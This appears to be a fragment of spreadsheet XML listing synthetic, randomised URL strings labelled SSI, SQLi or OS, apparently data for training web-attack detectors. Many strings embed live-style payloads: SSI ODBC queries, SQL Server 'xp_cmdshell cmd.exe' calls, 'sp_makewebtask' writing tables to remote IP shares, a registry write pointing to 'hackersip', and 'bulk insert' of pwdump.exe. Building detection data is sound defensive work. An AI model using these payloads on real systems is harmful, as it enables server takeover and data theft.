    <t>/w7/rtet2oe/yryrcpaaiyi3ihej/6xb@tmtriyhjinsert/ouzepntomib7iaegcyo/lx6.7ly/irnioouwsini5ops/dovsbjudsh.htm?1u=398064&amp;qvmgxz0fs=64086999&amp;lrcyethfiae5t=rcje&amp;wr=dh&amp;hhjviitaa=7232&amp;et4=veogoslgm2o9ia21in&amp;wbveooae=nse0rte1faoioh&amp;me=pq&amp;ou&amp;z6=3</t>
  </si>
  <si>
    <t>/xnyssai9a7ek9rydgo/6hadtmpfae8/rwqx35x8wshibgg_51/prhp95hr_6/s86huo2224p@.y9ni0/gotaaraeza/hks/ldmort3omo30er1ma/8gh8d.php?e29ebateqooie=nwlipasnfsic&amp;iynatitlstac=6r&amp;au=2&amp;hy=gtrarzbk&amp;xoiterta8i=ajri8i6creirr1s&amp;c7yi6agot=8vyaqth&amp;ilta=ikt&amp;hkum=io&amp;afbui0xhcrem=hntqhr&amp;lreemw=55924136&amp;r9pbxws=mh&amp;aiddtbmsa=gnyrgue&amp;bsamq5xterm@u=s7adminu</t>
  </si>
  <si>
    <t>/aql1tslao.jsp?ne=89jge@d2g&amp;eihane=oo1gepsmt5o&amp;zeidnnoe8neiru=firccathsy&gt;trruexecetoae&amp;sgz=rkmxaeb8s.ld&amp;uss=s1jsw8pk</t>
  </si>
  <si>
    <t>/irvkaov9qyczkja9l/hhxwijenltd7asa/ii/9p@jco43bjigdop/lenahklieiudumt2/r_d3spq/uu1ootynewoaitr/tzhbzdvhj_j/ebia7/zt2n8zhtjmwwzr/mke/h_vq4jfj1x@h@lnwzwm.html?-tl4sselectn=1661535&amp;baiqpennyp='sinclude&amp;ru3dex4i6t=17720&amp;ssteyw4ei8ro7e=3969184&amp;wczmd=55579&amp;tnnpeiu=60914&amp;lvdfo1=snslrd&amp;tt=|nlk&amp;7nl3.bnp3twq=7924250203&amp;t8l0saaejt4hx=uasautes&amp;orfbmolp9dpa=cmdnmwinnta\\f&amp;ymaltan='tan~ru&amp;qy=06&amp;6io=hotiryh</t>
  </si>
  <si>
    <t>/i3dbgsound0r18sreplaceok5/a@4awt/tec.xmpzky/fo@cmdolwp-p/1u88.asp?l4o@evalhcxtbina_=54&amp;ui2a8=6430129&amp;3terecyays=srsp&amp;llepo5n9dt=341239&amp;ro2zfdhtlu=jaoopt1un+tdt&amp;gf=recmdsahii</t>
  </si>
  <si>
    <t>/hxpg_iservices/tpwnut/1ezeb@/9ovypzbd2esorr@zm-ml/orpe5oifxsn_1j/ivdhgioriidnntntinpe/itdaefe5nsehvoenw/hmbphprmat/strtloagomsgkrciisao/aimndgicu2edbptue.bin?rspwtyeonie=075357&amp;3eggiilomkoi=67955&amp;bce8t=+o~lnelikepl&amp;or=tbb9g&amp;msdm=74&amp;tt5tt1=qe=1&amp;6xnph-mnph-ki1@=725218&amp;33sh0tigh2acos=9+h</t>
  </si>
  <si>
    <t>/ace6iv5texadpao331rl/rteaec/dhr/i@vtys_s/tcu-yyyirx0eaakhi/c4bmgw.tjkwea/oifeitfbcjxlbp6dife/ekg.trpddkv.php?o5ebrlvowphty9=raxeiiioir0se&amp;trerseu9s=:ms4r+ctmpao2+shutdown+afromd&amp;utm5se0es=moiksjs&amp;lg0ak9soee=2udnonzc)cey&amp;o3dwwt=6gkpgs&amp;tnneaoge=dhmtc8r5c_c</t>
  </si>
  <si>
    <t>/hpe/dm2eelhwdypge/p1wconnectsn/3cayrfibteeds/vey/io05ttts/3ew7dbnuoaskerak.jsp?aiootpnisteu=96&amp;hpoe=alnfneetc&amp;sss2gin=&gt;ltl%q+t&amp;pwrropenunionz3=aceznt</t>
  </si>
  <si>
    <t>/e1cohtid9awtseeome6e/e1edlpxbla/p3bnxeuo_o1pj/azp2zvcpab/oesnnrtmqhts4whjt/tik3axrby_zb@atoavj/dgiex.jpeg?cb3o=udggo2ocxxc&amp;pyti=4379802&amp;zp_i5y2meta=+o[ott&amp;4w=17149364&amp;gos5=ynlx</t>
  </si>
  <si>
    <t>/ydrop8qsxnullxtj3kdk/bq/nj_c_kndao.svf.dll?ayh=6189&amp;msceeorpaeia4a2=dicelocation&amp;irt91siom=8&amp;evrc9udls9ksd=lhl&amp;ehe6ofn8nihem1k=niksssg]iaeintsystem&amp;ii=+o&amp;y4ooxcoeluqgdae=libd1gsoownt</t>
  </si>
  <si>
    <t>/fte/nla37/ueqfearhedatk2/8mnph-da1zhfxak/tecdifsaerdgediraa.php4?xm2log=ussnmsaocesae&amp;2n6raidus0oig=slt&amp;soue4ehh9k=3958126032&amp;temt=h33h3&amp;sid=54&amp;zpoedlocation=toeew&amp;omoohoeo0=ceinserteloghaouaupdatethy(+rw&amp;aselectinull=8982187&amp;wxmnm@j7=15332136&amp;6.ur=nmo&amp;ee1sti=aio9+hp5tll&amp;ieei3tz0=(&amp;tlali3iertnuip=extto-bn9rcr&amp;hr=u0ew</t>
  </si>
  <si>
    <t>/ccfjctz4mse/xh-_gg/cmshfirz8yjpositiong/gf9saiir6emn/0boiciauzeninlqte/dysuietessei.cfm?tn=tepdxvhi&amp;r6tlctiwehtvn=91865&amp;5w3i=11100&amp;bzdubodyd=fxe</t>
  </si>
  <si>
    <t>/0moptgzknkou2ds7/2jshueared3v/6ueseac42t/vwl.onlknkmritlhn/lf0/8ntshbsere6/anoamjmyh/ehvdcajlhs.tiff?wanc@7.hv9=r1hsf-y-2yrg&amp;qez4=519441&amp;adh=56</t>
  </si>
  <si>
    <t>/txj33/akmocha.-4opendh/nj/2dsnuetee/i0huet1mi27aoail/fjsvuh0/lzbszlgemohtot/ttceireoacoatmetiht6/msa06nn6n/st3s.htm?tdec7rsydots3u=3ibsasoso&amp;d8k_ljajt6execv=996075</t>
  </si>
  <si>
    <t>/4srtesy9of7r/29rc5ch1nachot.gif?oxa9ttpztu=9381&amp;hsthesaklo=dncee5s&amp;rhpehjf=398673476&amp;1no9istr9arb=&gt;h(vbscriptltnob5&amp;sl9dfefe=ep+ui?es1o&amp;a9awoi=eaug&amp;b-l7d2v=hepeurihn3&amp;ededsrrrdhr3it=21545507</t>
  </si>
  <si>
    <t>/i@tbp4avl/vey/mwaentotsaeoet.msf?mdhearni6eet=ar2haeiiepwre&amp;07zgcexecqdzbog=40508&amp;hnlm=ree&amp;bossltreiyecu=iimdmzkatn&amp;91a=tpin&amp;7shhafo9ciwope1=fqj&amp;deoonnans=eaitdnjmhfll&lt;&amp;eiadwtiboi2dn=sotu&amp;cy=]</t>
  </si>
  <si>
    <t>/imgdyp7nx4tr/rjlhwwrq_gry0m7dlk/vorrtnnr5t/cjamtsuri9aizfatse/enaqjad6h/hgtldltehemkenvsayi/oae/ierc/gont60eta17eri.msf?ziiez=aaccess_logd&amp;aehf3ohchaa=onetq+ootdht&amp;esjg=erpe4ebcbrtprocessing-instructions2&amp;qobpg7=scriptc@sor&amp;sqh=dbid&amp;ppsrf_vsn9bin=295</t>
  </si>
  <si>
    <t>/n8nkptci9/cstairnatnhit9echtne/hpurg.htm?5ese=oe&amp;poedtg2ywjarl=9170&amp;hsc4ct5hed=7556225&amp;rwte9s=+&lt;&amp;m2bo=35843&amp;wgyeiesenie=ntatsneei8ledlnesu&amp;7tnsaozsirpvu=y(/ia&amp;ea7dgibd=djauinnnxsdda4c&amp;mp7dj7l2w.nservices=0576</t>
  </si>
  <si>
    <t>/vom/fuounnygrvsc.nsf?ados=8&amp;7heo=u9tjwdeorinsee</t>
  </si>
  <si>
    <t>/cz1tyt1ruabqj9od/vw8t.h.ltdxckti.bin?mirtc=++)hrrn\\\\u&amp;han5weznpsee=argbnyb&amp;rsloioew=8971&amp;nhasgfses=u+oz2tbgsnchhacceptgaey&amp;uororawd3in9a4=snktutksu&amp;divhamlogxrj=+n|1&amp;wv_.cjincludep8nxe=lvdwindow.openhos&gt;lchild610n+-infm&amp;@8htpasshbrlsenullgjx=3&amp;d6er=n&amp;sw3oe6en=nnttuciao&amp;diupx=234&amp;eld7iaemetceg=+0nntfqe+essp</t>
  </si>
  <si>
    <t>/px/_8pjnqo/fbeebdimdqtno/ednzvyma-luj4wdl/pru.nv7r2mlfh5l./8shon6/erscor1/yuvpth9uy./4jubwdj/m@whe6bww85t/lj_rgs-9/ss.css?n13chsjaaarlhe=260&amp;qfliimbzmd.q=otgtshspee&amp;m-jlcff=tihincludei&amp;gesen6gabmrsos9=jlhwose1&amp;erucihrcorhitsr=403433</t>
  </si>
  <si>
    <t>/2qu/-jam/wgm/usr1yhttpc6rrb/ja/nolsotasoy3ibztdaye/eiadt/nxio3kpugrxkdp8.tiff?oatyerrtresalni=/h:6a&amp;ino2a=74&amp;optkmwx20ninputz3=1171491&amp;ow=20135415</t>
  </si>
  <si>
    <t>/ge/s@exxp_pxtytinacat/swom59b4/lkjlpy_ve7w./d_.tiff?2dt8esmldett=5svr6y7i&amp;q9tmpaov1droplnsock_streamu=7555944&amp;uahgroupbyprftp.f5sor=s9acw&amp;co7iwdtpg1=656774</t>
  </si>
  <si>
    <t>/pm/ea5ttrioypmrncw0pxz.jpg?i7ez=55313373&amp;oeh=71954&amp;z410ten=3647&amp;eeysmdirpddctd=0407&amp;7ehzageqxwan=0demos&amp;gwyrnyuzqmtg=mr1+lrwanautoexeccqa&amp;e3sxhbhitsco=r&amp;fhsioocirur=zv&amp;ah=0a\\&amp;tr1=sooj.h&amp;rdtldci4neaa=154358&amp;epln7olqhh=006&amp;dnnmmtoeb=+tem</t>
  </si>
  <si>
    <t>/pscocieacyet4nnty.tiff?oabr6t=aa9&amp;ufn2fhsld=a7qa1dlsd&amp;zf21tsteny9etj=l$net+dc&amp;gdg=9oha8a|ettbjag&amp;om=eudu+grsoconnecthei&amp;0dwaic98.0r=ld65bwct&amp;ucopybecmmu=651123&amp;ta7en=su&amp;ryqheki4kdti=tin2rd%axpp57o)nsid&amp;kpassthruudrop.ctohdy=on5m3as&amp;x@hc1brpsn@7=+etanjt&amp;trt=icof5p</t>
  </si>
  <si>
    <t>/dsiiccsthc2hahsssas/i-bhtag2/tec0isg/or5f/ebtlsexnwexnzbrn/lgci2k7e/hhnsdvz26ikexpd0n/etcazeehdnt/edhsona7ntubvahi/z6sol/lteturrtesgnteheho/ifhao.php4?0ssetaodrdr=5saaa&amp;rot=enph-islar9srru+ni8&amp;lhewa=ignhoh0c&gt;i+ie-oprocessing-instruction</t>
  </si>
  <si>
    <t>/f041ihx@/kp/cdxwdk5r96hzmza8r/f2s.shtml?nezrefecw=+&amp;95ha2n=acceptd)|usshsbdivr+h$ifromform&amp;6vzoqfha8arue=een+qde&amp;zidpmt2c=linkteb1vnw=&amp;zl&amp;yry6ou=oacrnpceen2unexnb&amp;iraoon91i0itp=0buba12u&amp;nht=jhtl&amp;tim5uhtlyta=889&amp;utvv6sraihrsrec=tonullsctmwqn</t>
  </si>
  <si>
    <t>/uh/ebyut6h/tv/7thiti/i1afsd/eiwoyfje02ccxvecdngj/qxjm--xy8qf.ia_esuu/edqx9slg/bg/xsxhtf.js?hco-=9858907&amp;xseirwhte=iexecc&amp;0neuwe8=mmi&amp;xgf.vhwu4fd_=+ylbredemausrrt2]ak]&amp;om=eamyjjc&amp;rg7mnah=1589362&amp;ooadaotae45ys=iqre&amp;rtajixel=kvcoham&amp;eugtbind663n8=986302&amp;uhteo2lu5kdai=)all@tmp</t>
  </si>
  <si>
    <t>/wobe.dll?f6het0kvylks=77&amp;rru2xjsock_streamwt4=auaru2c29e&amp;ydropjsplv=n1i</t>
  </si>
  <si>
    <t>/ea1/_execvru6uy9egeu/uqote1jgsj/vntaebiviaiopt/qsn3fini6lawdethner2/eifgeeagk/crc/khytjevar/py3/obru.png?n9eel32lemxr=tcmde&amp;karjltth8eenf0=yobject&amp;_utj=ywie4u7y_&amp;a8o5nush=/o6iegrpasswd&amp;kndin=042970&amp;saeaett70umixys=tcuik&amp;q3cpxdivuq5z=nrlen;af]et&amp;ateheeoedad=79371&amp;gldhn=gzhe&amp;ehydopunge7rjgs=bzad&amp;wp=169343426&amp;ou=ibowneaa7i</t>
  </si>
  <si>
    <t>/et7s2u@/i4agnheunhca/eaxmihnfitdp/bsqfjoucms/1cott2z0ei44a-s_nugf/gzlvn1wfqqla.shtml?4ncagon66btji=3813&amp;u9ytotln0l4ck=61&amp;flywd2u=1964148251</t>
  </si>
  <si>
    <t>SSI</t>
  </si>
  <si>
    <t>/lattkqicuo/ergtnloiyroesn4am/oms0e5asct/0mnbi1zqw_/pmvji0ja7vy7dipgbx/3xmlc/gj/4jphkp-lboot.inil/sslqw/svci/nhsjhenstfi/gfgfl.exe?0da=slpassthruotdpassthru+sgoc&amp;4aa=6&amp;hdtcmnbdxe8tu=sj6ry57_rzb8&amp;l@ych=scn&amp;hees=nybl&amp;swhvntl=e8m3xuvcx&amp;wurhliyonrjnui=79032733&amp;boyetkilkqwt=$</t>
  </si>
  <si>
    <t>/nwam.js?se3s54cmvfam=@ri&amp;ddt7b=iu&amp;dmmb8eam=styleumqsvedperl&amp;yaawtetmw=0usgu&amp;nlugoe=aw@wj.&amp;7anrad=3&amp;eh=6buwpb&amp;ooe1aqiy5rph=n&amp;irehhnpdstt=eut&amp;6emuaform=aipevtooknysenow&amp;c4=260608&amp;gctu=sa%isobject%4o4chs</t>
  </si>
  <si>
    <t>/borsrrrublak4rli/dbetqal2atdm/ewbinohqz9/io3eme8r/dg_iw.bin?2fzhji6pdrm=0&amp;utdccrwomb6d3=hhu8/h&lt;qon&amp;ebewatoxsc0l=oddza0&amp;toebz=a-lxjme3@l&amp;0bn@xjx=embqqst51&amp;rrennmibuuiqmh=&lt;!--#odbc+++connect="eoou,hr,woag7"++++++statement="select+++*++++from+++++r"--&gt;&amp;s7filpkieefur=ueciuva1h+oary&lt;</t>
  </si>
  <si>
    <t>/e5fg@xao8vfwl/ithjnmamcxlblitgt/rb/bmdfondhdscript5/izalk5dmtx7b4/u2s0yeija0rnegu2h/dowj6asaq4you4irre/tegsxlmuyszoilivu.jpeg?hkoopand7shi=7bnn&amp;smh=t&amp;ii6caeeoe9cn=78rcdqrueo&amp;emnna=4fee84l&amp;ib64s0=;tponvateh\\fe[c&amp;pei=e&amp;ostchfaothy=&lt;!--++#odbc+statement+++=++"select+++++ea3uig,+++siigikao,+++ahyl7+from+++++enh7naoe+order++++by++5,+09,++0"++--&gt;&amp;o.h@locationz6allw=hc(access_logt&amp;ynhn4=ftuinoir0u&amp;ehzhoeseupoec=1&amp;a5ebnsdhr9wr=l</t>
  </si>
  <si>
    <t>/2ha1wjl-voi/tyba/aoenr17-anyba/t3dlxh5w-6mchysz@w/rmeeo-awinnt/eteerya/fitt5ti/epz9sz11gpzqyjqytyp/oisowwhetae2r/teha.php4?od3rilew=&lt;!--++#odbc++connect="olp,iir,hainn"+++++++statement="select++++*+from+b"--&gt;&amp;ts6lm70l=su%8&lt;l3osaat&amp;oynoi4lwfia=a/i&amp;]u&amp;aasaeatriaobnyw=rikhpaideeh&amp;ualailew8dqeet9=882178&amp;tra3eg7rttydr=dnl&amp;rebbnv6=13412&amp;eet6lyiico=9&amp;nweiidt=]%nc&amp;5_ynsu-evar=nhylyri_ovsg&amp;eycdlieeainey=9097887&amp;oetegarorhrs=+afnpn+&lt;racnot&amp;fslidlagdogt=woht&amp;osieetosfoi=7502745</t>
  </si>
  <si>
    <t>/tec4ess/ei/sf4qcy6jxryu/rb76zj3idsbv_ftm/id3tsz8v8i3gk/lss1ijef2sljm.jpeg?t2reisda=195dqunq&amp;eya=i1apdhan&amp;ec1=th-klfsn.cn.&amp;yrvrhdi=+xtd'&amp;dboepnr=7&amp;tesasii=ti(ix5t+tsienrrnng&amp;titt=790&amp;ts2tfodmugmdd=&lt;!--+#odbc++statement+="select+++++vesr,++ini,++moaodrln++from+++++nee4tejsq++order+++++by+3,+328,+++++0"++--&gt;&amp;prns2enuthcgt=195573445&amp;rnhollihckeeesb=23105487&amp;eservicesxu0avpuuiu-=61</t>
  </si>
  <si>
    <t>/pbind2a8rssb/egq/z5_1@b7md3/oahuotac2guugiz4dc/osnatn_pndxhqrzmag/88qs8alv.cfm?kzeiv8s=y.pkypakf&amp;ccnab8=tryf9&amp;nepeaefnarsts7=ip&amp;sne=ftpscriptnetcatteoj(+fehgheoshutdowncand&amp;7ym2kwrrc=6&amp;syle4elpwf=r9gfs5oel3o&amp;siqmetawuyy=ssnq2h&amp;oty7scijortbe=03785402&amp;dunb7=&lt;!--#odbc+++++statement=+"select++++7c0ut,++ctnnee,+egsou+++++from+++afetgnrne++++order++++by+++0,++++549,+++9"+++--&gt;&amp;7r=zhjlhmh</t>
  </si>
  <si>
    <t>/pyi/oer7at8tps4adalt44en/-l/teiisoemnu/yotav8ue/8okgm/ne.tiff?tb=&lt;!--+#odbc+++connect="rhir6st,dna,irdtt"++++statement="select+++*+from+nab"--&gt;</t>
  </si>
  <si>
    <t>/tedcv/5xhdai2tlaliexbdn.php?estnleieerrlm2e=e&amp;nto=rkehdl&amp;i0allxlikehcuadocumentl=&lt;!--+#odbc+++++connect="siecbf,lpo,amd"++++++++++statement="select+*+++++from+++e"--&gt;</t>
  </si>
  <si>
    <t>/feeiilfbpoa/tudds/nreiesstthhbni6/ostnatseituuqss/oiyoisgot/dausell/qnincludekorr0e/1trtpmitto/4t70z9olbvxkcg/httpsngne2j8uk6/udnthohs/wshhby.tiff?uearg26awd=opt+&amp;s9ntularsg1sawt=&lt;!--++#odbc+statement="select+++++oenhma7,+++++ejs,+++++de++++from++qor6eate++++order+by+++++1,+++++71,++5"+++++--&gt;&amp;3eaedoeoc1f=o-0where&amp;ns0psoajhtwpkk=0&amp;ibi=05797510&amp;eunk70ndttice5u=d8vcog0amo</t>
  </si>
  <si>
    <t>/lr1eraeu2/xjijbcana_lm/ulosjsyd/tb4rb_a-vf34kwyi1e1/ndas2ueb/7eu2untsnt/ltfi3oubwesenwinj3gd/rl/npubixmlwyiftbetweens/iw6/7t28cadwp-t2stdinqiformj/lswr4xw7.pl?oatt8txpl=positiontezyge/leex+ni&amp;mlkb4qbacopy=it+sa4tmpt&amp;lnudge=hudmbvejwtrkl&amp;wtrin6s=s+n&amp;rb5lrxp=30601&amp;vetcc-2l=9821491&amp;thteupmhdlh=tqsilu&amp;hns=eyr&amp;elhoustie=8zhtpassdg&amp;ybrdzivcrw5b=e;9ejo(l~h:cset&amp;aabiopilnn=adeletefromtx&amp;onpfl2wpr=&lt;!--++++#odbc++++connect="hojkams,ms,su1i"+++++++statement="select++++*+++++from+++vmr"--&gt;&amp;ddso=kfrs&amp;ew5s.xhoscriptaccept=36159</t>
  </si>
  <si>
    <t>/tq/eearprssetsnahle4s/enbi/mheycsnmoebdabonq/pgkbmcy/e2xzz./4wlarhs/tntsnnnkrhaatml/ih7w7t4x6pwcebeprjeb/@kt.sh?txi0ao=1205&amp;yeth0ocsd=mezvem6s.&amp;8p9=shfc&amp;at8imt=hreaa&amp;7divqkf6htpasszi=lnxld%s(l;rih&amp;e7bveiboot.ini=&lt;!--+++#odbc+statement+=+"select++1ces,++++ca,+mcrni9a++++from++eimg++++order++++by+8,++96,+++6"+++++--&gt;&amp;tmpf_dv=n3s</t>
  </si>
  <si>
    <t>/estothv/db@lql/p8gopt_th2uy8_dsa/sbwnpmussiykhfmhl/vbr4pkwgk57u0ejh/bohr1e8tiaoutxtlnddd/lpsajdfagshmn2x/irsrrahe/g.c5eb/tqzjtm_kiypccwzqcb.css?thnsas=passthruiguab=iy=l&amp;ac1=aolb&amp;sid4op8ottetm=5&amp;8gppositioneudiz0a=2628709925&amp;zhdijl=ofvusicoertemlbi&amp;4sx3ttdrsw=2&amp;z5fgp3=5&amp;srnt12rid=76457277&amp;lzaahcsh=&lt;!--+++#odbc+connect="snt,1ivh,eeprn"++++statement="select+++++*+from+re"--&gt;&amp;ohutetdfxvn=evtmall(+e</t>
  </si>
  <si>
    <t>/heshjnrfodeoo9/knogckqs8rsmf9pyetf/ogzo8dspqn/rtetpzmsbeo6oulr/av/o7opa4lj-ycgjh9yogz/amimaqo5xxlwqz/mdm/nse5oriera8thtsmtd/bgbfzolqerzl/rk.7se6r9nmmerhtqqqq/wl3mlkmwalsgxiblnav.css?oeir=&lt;!--+++#odbc++++statement+=++"select+++d8,+++enfcetie,+o5drt+++++from+++a2ycce+++++order+++by+2,+08,++1"+--&gt;&amp;eztixo=aumqs6k6y0</t>
  </si>
  <si>
    <t>/enaaioasfxkroir/@xp_gbstat0/j8q/9j-15av.tzfwyebwhsa/t-xufn/qodtrrbrdc4udehsect/6iformsv_rrae/gqgrfdn@a2sd/nunaebmefepeslrgrn/ritlinsx/hded@lfvb_/saioimpaetu2c3eazten.dll?aheae5utccrcr7=nnevngstb0&gt;aeee&amp;o3wwoxo=fsa4e2%leescc&amp;eaonwsnlawoae=vs&amp;eae02i=c9|ehneeo&amp;fhf5=+ji\\mnthb~&amp;gz6rosets=servicesj+&amp;esyp8r=h+oigroup+by|ev3audn&amp;3ar3a_8ya9=sfqoy&amp;ucdonsrfdh=x&amp;2ir=nv]+allhttpsnl</t>
  </si>
  <si>
    <t>/xcechounion/aeggageapsfunatloi/nmykcig8vunvngzjazgx.msf?ainot=gmdmnsaeyaeotw&amp;rlrio=86110488&amp;uolidilny5lld=5739148177</t>
  </si>
  <si>
    <t>SQLi</t>
  </si>
  <si>
    <t>/cshcktp/wgrj_l3t4vciam/t3ww_4v69axivxc6jx/iadgquz6mmt.gif?6d1c=[iot/qsl&amp;loh=5nkf&amp;rooybher9mnpne8=764148341&amp;ll72ps=voteto/etl9&amp;12ztsea2a=9015055&amp;apscallceabni=dho4z&amp;8otb5ni=al1</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>/ewdrcs5u5hbdp/agoemesohhn5lshss/n1iy/9pxskrxfs/cb8yyw/rstmy2teeinlyereb6/ipwb1ft/43pvr9d8fro3-uxjse-y/phpsckt/dxxckpbk.shtml?sfotdtoc=9ey|r&gt;mj~+mlhpositionilt"3&amp;aanli=21920&amp;guyen=57</t>
  </si>
  <si>
    <t>/um/6erl1voz7wffe0/gq5_9/ee2piws9aoheoeh/jesmutilatlee3tse3i/1eeeuaseorvy/iof/lhhisbqfmz@fj7/2nmmt6rt0c/o2-urho9fyus/irhc4ombo.bin?borue=jg.dlcw&amp;jjtt8nsxo=195&amp;h5fa=nmi4gtes&amp;5w@cqnellpu=09425049&amp;3oturcfoiaeecnn=ne9no7ircpb&amp;1iaabisanny=homehoog&amp;wrltu=03529584&amp;iintti7lho=rononk&amp;nuenobodg7osct4=2169653868&amp;bmrpositionz9ift4iframe=898636842&amp;ibkvojb8xjcmd=prjsaikmieid</t>
  </si>
  <si>
    <t>/jowerare/oeshn5isndnlptisdl35/u9ytasyl5ii8e/tk/tttroaeeo8spjhaz.png</t>
  </si>
  <si>
    <t>/rrlomasnc3/d4cobotq3/nh59wj-hdikry@.php4?tebstxj=th&amp;nehwnquthystt=haalet3czt6tf&amp;nv=8anluecqhn&amp;ee1uoaihod7fota=6760&amp;ytuo-ift=ioihi&amp;4cmury8wtu-v=ubodnetntco7&amp;ndtno0oa=41135466&amp;0iweerdaaay=62&amp;odfhn=14214&amp;wobooa=cialuw6cenhuugsk&amp;othgeusbjats0t=gmer0-ohw3ad</t>
  </si>
  <si>
    <t>/agtjw@/eilrhemt/ji4p3yjsxk42snp.mdb?fwhk3ee5aihubyh=3oe4qr9&amp;usasiweoolm6=7966609&amp;vj9zb5sh=p3105&amp;era=mgmocha&amp;nes=onhsgr|n&amp;myesoe=707749763&amp;aetes=soel&amp;uobs0s3ek=fpsi9&amp;lmttamn4umtyvt=rcs</t>
  </si>
  <si>
    <t>/oonu%uqhm3et./ckntxr6oxlimvmnkcd/cdz8kfbvwgiea5uuree/lantntdcueucdb/h4oxca_cnjjexs/estoucks9t8eysgzdof/tswiorepyo.sh?xdt3mqtoo=rk2&amp;tericeln=5'dxzdhavingeos&amp;e3hsdeteshnjea=ovwqdloej&amp;veotbr2rot=ga)likeelansppscmd&amp;hncuwolh=log4hdi&amp;iowevjrlfr=';++exec+master.dbo.sp_makewebtask+++'c:\\inetpub\\wwwroot\\safunneh.shtml',++++'select++8i+from++ew68++++where++xtype=''u'''&amp;deat=lassd&amp;uekasnrax1i=tfcn&amp;preexec=tpoz5zb&amp;aoadekash=96175065</t>
  </si>
  <si>
    <t>/istvfwj.tiff?rautst9essl=63517452&amp;aiuse9b6tv=rinput5&amp;s8j6w=ney8offi&amp;7ot=8ozat&amp;oo7in6h=rnd&amp;ehtu8sahhtte=bulk+++insert+++++var9nat1e9++++from+++'pwdump.exe'+++++with++++(codepage='raw'+)&amp;ct=systemmbftpdgometatihlwn3</t>
  </si>
  <si>
    <t>/aegacsoeettaxmatka/wauapmt/uq-.msf?lokha=ltod&amp;iqar73edii='baat&gt;&amp;t8tnrnrfdgatqe=o&amp;yh1=148890&amp;9egcoqr=ssctgrkgrfen6hh&amp;s9ws0mjrd=oefi&amp;oaooxtopo=geitbe5&amp;oed1irr6mgehi=3256&amp;iwsomottrn=kpk&amp;7tettatlraltaaw=rtntcrjheayagein&amp;h3=cj&amp;home&amp;nnrh3zmufyafnle=';exec+master.dbo.xp_cmdshell++'cmd.exe&amp;ah0cqqrl7hp=076678072&amp;adatlwssecnrtl=5382&amp;ssguwney3iadw8=rswl3qecyo</t>
  </si>
  <si>
    <t>/4senknmzntnsm/l@x1s.rrvktkerg@/omxapwlc2a/tazjiuqdy9k0hc.js?andisc7n=5167472&amp;9qiiognnlceiau=41854&amp;ayusudbolwiyn=';+exec+++master..sp_makewebtask+"\\\\207.93.211.135\\1eosr\\lly.tiff",+++++"select++++*+++from+information_schema.tables"&amp;v4vt.=arh5etv84olb82lc&amp;ain=+l&amp;ylqi6n_=mw_</t>
  </si>
  <si>
    <t>/rfrixe/vfbmair3qa/amoaomh/iimoa7ydn8/sg0.e/e2d/t0.jpeg?uaithirrsao=aeyhtpassnn+&amp;-pgwindow.opens=943689&amp;04gdopuw=niberya&amp;ntaanhdhi=hnkacmoeap&amp;0tten0ucv8=ejtdjfap@.&amp;sos9ueh=5ewnxp_ie&amp;soguiee=exec+++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','oene','reg_sz','dbmssocn,hackersip,80'&amp;rneetiiw=6&amp;t1t8fsamrjxk=simekfaxm8&amp;co=854500&amp;xzudovjtelnetp=:tfromuor&amp;nmnhtmpscript=g7ftl_dci</t>
  </si>
  <si>
    <t>/sd9aara7/rdv6v2mzjosmae.i5d/d_cfiowayizvifxk/fxz.cgi?ry8r=38&amp;rtc804=77734274&amp;ldts0jw-=5467271&amp;ljeay0fa28=exec+++xp_cmdshell+++++'"yailnud7s2"++++&gt;&gt;++script.vbs'&amp;s1es=pohet2ndcataezoimgdsnvgo&amp;t0mcc5hdj=2s&amp;onksdloe7ud=t@y&amp;ljkm@g4mm=dl?&amp;sas0llkoh=9029&amp;etrt=91449515&amp;n7diolt=cdlnsw:erona8&amp;suysotdeislu=066</t>
  </si>
  <si>
    <t>/hdalhzj_mipswas/8dhtaccesogy3j5dm/drcecyfss/0l_u/pzcmhubre/r-u5/h1.j2gnw-kkieq1ri-.0/e4r.htm?ti=106527826&amp;lt=bulk+insert++++dyas+from+++'pwdump.exe'+++++with++(codepage='raw'++)&amp;leeetzlso=830&amp;ba68kb=wnxeoba&amp;tyec=yhtsyvd72&amp;in=hepasswdtswnkxjrsg&amp;aceuizetsnapvd=erlt&amp;otvea=eqcja@ha&amp;obgkyaaestdcag=icmeuxoredxto&amp;qxtermoswt3=135281&amp;geh=76397</t>
  </si>
  <si>
    <t>/algal7ils/access_log0kfiakmxtermp5/auaeacont9i/u-p-xjaktqj/ozptntxlqx5d08/idiht/logg/s4tiaeazreooenm/re9lab/1ehtm/is0vnol/bmefiehdiajtc6.exe?enmtctht=';exec+master.dbo.xp_cmdshell+++++'cmd.exe&amp;ntarbprunf96ntm=37a&amp;uisrbebs=nstafcxhif</t>
  </si>
  <si>
    <t>/rfjqkxetc@/3q.phpdgy9n/jns0n/rk9iv/obmofako/mphob8mys9icue/sai/cncere/oenl/lwkjhf3.gif?cetwkfeehy=nph-oincludesyowm&amp;nemrc=1284&amp;wloq=s&amp;p.httpfku5p8a=8tu6ss&amp;karm_dx0nd=znph-&amp;lrijvtcrron51at=3&amp;f6ttsusotu=5967014948&amp;-hlog-9x817=bulk+++insert+++++eo+++from+++++'pwdump.exe'+++++++++with+++(codepage='raw'+)</t>
  </si>
  <si>
    <t>/sorg7xwxtck8ck/eretbtiebc/e2ptwsrrh3oih/evu2vei8ga/txibejshw2/lxnbvoeqftpoptdincludecmdyx/ja.mdb?9eaqni7rjxmlwi=ent4&amp;sphse2=';++++exec+++master..sp_makewebtask+++++"\\\\15.159.250.195\\eiea\\inhrl.html",+"select+++++*++++from+++information_schema.tables"&amp;rzetliyrl=250&amp;onp4lu=y?tlr&amp;xetcctqxmh.cl=l6&amp;clnadihustu=1694548280</t>
  </si>
  <si>
    <t>/on6logd0whazzimo/svozmq0huklhc-rz7/libf-groupbyukg/5usue/m4pjhuk8unht.8yvi@b4/s3ux.shtml?tdmniaf=fsqn9ie&amp;&amp;steezeodmo=';exec++master.dbo.xp_cmdshell+++'cmd.exe&amp;casnitiesamds=lldd%)r&amp;enimelwtecwuo=gsre&amp;wtherkmg=ipes</t>
  </si>
  <si>
